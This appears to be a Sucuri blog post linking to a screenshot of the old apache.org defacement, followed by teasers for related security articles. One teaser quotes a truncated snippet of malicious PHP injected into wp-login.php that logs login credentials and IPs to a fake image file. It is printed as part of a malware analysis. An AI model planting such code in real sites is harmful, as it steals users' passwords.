Screenshot of the apache.org defacement (10 years ago)

We recently published a case study of the apache.org defacement that happened 10 years ago. You can read it here: Apache.org defaced – Security archive case study

We didn’t publish the screenshot of the defacement, but our friend @EdiStrosar sent us a link to it. Check it out:
Very funny…

David Dede

David is a Security Researcher at Sucuri. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.

Related Tags

Spam content injection

Samuel Odendaal
February 21, 2017

During a recent incident response investigation, we detected an infected website loading spam content from another location. The malware was responsible for fetching the spam…

Read the Post

WordPress Vulnerability & Patch Roundup December 2022

Rodrigo Escobar
December 28, 2022

Vulnerability reports and responsible disclosures are essential for website security awareness and education. Automated attacks targeting known software vulnerabilities are one of the leading causes…

Read the Post

We recently found the following malicious code injected into wp-login.php on multiple compromised websites. \ } // End of login_header() $username_password=$_POST[‘log’].”—-xxxxx—-“.$_POST[‘pwd’].”ip:”.$_SERVER[‘REMOTE_ADDR’].$time = time().”\r\n”; $hellowp=fopen(‘./wp-content/uploads/2018/07/[redacted].jpg’,’a+’); $write=fwrite($hellowp,$username_password,$time);…

Read the Post

How to secure your ecommerce website: an ecommerce security primer

How to Secure Your Online Store: A Ecommerce Security Primer

Victor Santoyo
May 25, 2023

Welcome to another installment in helping website owners secure their digital assets, this time with a focus on the world of ecommerce. If you’re an…

Read the Post

Self-destruct malware

Krasimir Konov
July 31, 2019

The majority of malware we find on compromised websites have been planted by bad actors with the intention of concealing and accessing backdoor access. During…

Read the Post

Reflected XSS in Cookiebot Administrative Page

Antony Garand
March 23, 2020

A reflected XSS vulnerability has recently been found in the Cookiebot plugin plugin, impacting a user base of over 40k installs. Versions prior to 3.6.1…

Read the Post

What is .htaccess Malware? (Detection, Symptoms & Prevention)

Ben Martin
March 15, 2024

The .htaccess file is notorious for being targeted by attackers. Whether it’s using the file to hide malware, redirect search engines to other sites with…

Read the Post

Korean Gambling and Call Girl Spam on Hacked and Non-hacked Sites

Denis Sinegubko
June 7, 2019

This blog post talks about how a web spam campaign that targets only one country may create problems for sites owners around the world —…

Read the Post

Limit Login Attempts Vulnerability – Patch Now!

Ben Martin
April 12, 2023

On April 11th, 2023, a software update was released to patch a severe vulnerability within the Limit Login Attempts WordPress security plugin. With over 600,000…

Read the Post

Sucuri WAF Now Supports HTTP/3: A Faster and More Secure Web Experience

Kyle Knight
January 28, 2025

We’re excited to announce that the Sucuri Web Application Firewall (WAF) now supports HTTP/3, the latest version of the HTTP protocol. This upgrade brings significant…

Read the Post

Related Tags

Related Categories

You May Also Like